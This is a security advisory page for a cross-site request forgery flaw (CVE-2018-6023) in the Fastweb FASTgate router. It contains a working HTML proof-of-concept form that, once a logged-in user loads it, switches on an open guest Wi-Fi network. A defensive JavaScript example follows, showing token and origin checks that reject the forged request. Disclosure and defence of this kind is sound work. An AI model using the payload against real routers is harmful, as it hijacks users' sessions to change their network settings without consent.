packetstorm | Raffaele Sabato | PACKETSTORM:147571
May 10, 2018 - 12:00 a.m.

Fastweb FASTGate 0.00.47 Cross Site Request Forgery

packetstormsecurity.com

EPSS: 0.002 (Low), percentile 51.9%

`# Exploit Title: Fastweb FASTgate 0.00.47 CSRF  
# Date: 09-05-2018  
# Exploit Authors: Raffaele Sabato  
# Contact: https://twitter.com/syrion89  
# Vendor: Fastweb  
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/  
# Version: 0.00.47  
# CVE: CVE-2018-6023  
  
I DESCRIPTION  
========================================================================  
  
An issue was discovered in the Fastweb FASTgate 0.00.47 device. A cross-site  
request forgery (CSRF) vulnerability allows remote attackers to hijack the  
authentication of users for requests that modify the configuration.  
This vulnerability may lead to the Guest Wi-Fi being activated, the Wi-Fi  
password being changed, etc.  
  
II PROOF OF CONCEPT  
========================================================================  
  
## Activate Guest Wi-Fi:  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://192.168.1.254/status.cgi">  
<input type="hidden" name="_" value="1516312144136" />  
<input type="hidden" name="act" value="nvset" />  
<input type="hidden" name="hotspot_broadcast_ssid" value="1" />  
<input type="hidden" name="hotspot_enable" value="1" />  
<input type="hidden" name="hotspot_filtering" value="all" />  
<input type="hidden" name="hotspot_security" value="WPA2PSK" />  
<input type="hidden" name="hotspot_ssid" value="GUEST-Test" />  
<input type="hidden" name="hotspot_timeout" value="-1" />  
<input type="hidden" name="service" value="wl_guestaccess" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
III REFERENCES  
========================================================================  
http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/  
  
  
`
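
As the PoC form shows, the configuration write is accepted as a plain cross-site GET that carries no per-session token. The check below is an added example (not FASTGate firmware and not code from the advisory) of server-side validation that would reject that request; the request/session object shapes, the `X-CSRF-Token` header name and treating `act=nvset` as the write action are assumptions.

```javascript
// Added example, not FASTGate firmware code. Request/session shapes, the
// X-CSRF-Token header and "act=nvset marks a write" are assumptions.
const DEVICE_ORIGIN = 'http://192.168.1.254'; // address used in the PoC form

// Compares every character so timing does not reveal where a mismatch occurs.
function constantTimeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Origin header if present, otherwise the origin part of Referer, else null.
function requestOrigin(headers) {
  if (headers.origin) return headers.origin;
  try { return new URL(headers.referer).origin; } catch { return null; }
}

// Parameters are read from the query string, as in the PoC.
function checkConfigRequest(req, session) {
  const params = new URL(req.url, DEVICE_ORIGIN).searchParams;
  if (params.get('act') !== 'nvset') return { allow: true, reason: 'not a write' };
  if (req.method !== 'POST') return { allow: false, reason: 'write sent with ' + req.method };
  if (requestOrigin(req.headers) !== DEVICE_ORIGIN)
    return { allow: false, reason: 'origin is not the device UI' };
  if (!session || !constantTimeEqual(req.headers['x-csrf-token'], session.csrfToken))
    return { allow: false, reason: 'missing or wrong CSRF token' };
  return { allow: true, reason: 'ok' };
}

// Constructed sample requests (hostnames and token are made up for the example).
const session = { csrfToken: '9f2c4e7a1b3d5f60' };
const forged = { // what a browser sends when the PoC form is submitted
  method: 'GET',
  url: '/status.cgi?_=1516312144136&act=nvset&hotspot_enable=1&service=wl_guestaccess',
  headers: { referer: 'http://other-site.example/' },
};
const crossSitePost = { ...forged, method: 'POST', headers: { origin: 'http://other-site.example' } };
const legitimate = {
  method: 'POST',
  url: '/status.cgi?act=nvset&service=wl_guestaccess',
  headers: { origin: DEVICE_ORIGIN, 'x-csrf-token': session.csrfToken },
};

for (const [name, r] of Object.entries({ forged, crossSitePost, legitimate }))
  console.log(name, checkConfigRequest(r, session));
```

The forged request fails at the first check (write over GET); switching the form to POST still fails the origin check, and a same-origin request without the session token fails the last one.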
